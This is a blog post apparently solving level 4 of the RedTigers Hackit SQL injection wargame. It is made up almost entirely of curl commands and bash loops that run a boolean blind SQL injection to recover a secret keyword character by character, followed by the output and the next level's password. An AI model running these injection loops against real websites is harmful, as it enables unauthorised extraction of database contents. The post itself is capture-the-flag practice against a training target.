# RedTigers Hackit wargame: Level 4 


# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data "password=646f6e745f7075626c6973685f736f6c7574696f6e735f41524748&level4login=Login" https://redtiger.dyndns.org/hackit/level4.php
                <b>Welcome to Level 4</b><br><br>
                Target: Get the value of the first entry in table level4_secret in column keyword<br>
                Disabled: like<br><br><br> <a href="?id=1">Click me</a><br><br><br>
        Query returned 1 rows. <br /><br />                     <br><br><br>
                        <form method="post">
                                Word: <input type="text" name="secretword"><br>
                                <input type="submit" name="go" value="Go!">
                        </form>
                        <br>
# for i in `seq 1 50`; do echo $i; result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20length(keyword)%20from%20level4_secret)=$i,1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# for i in `seq 1 17`; do for j in `echo {a..z} {0..9}`; do result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20substring(keyword,$i,1)%20from%20level4_secret)='$j',1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then echo -n "$j"; break; fi; done; done; echo
626c696e64696e6a656374696f6e313233
# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data 'secretword=626c696e64696e6a656374696f6e313233&go=Go!' https://redtiger.dyndns.org/hackit/level4.php | grep is:
<br>The password for the next level is: <b>62616e616e61735f6172655f6e6f745f626c7565</b> <br><br>
Posted by t0n1
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)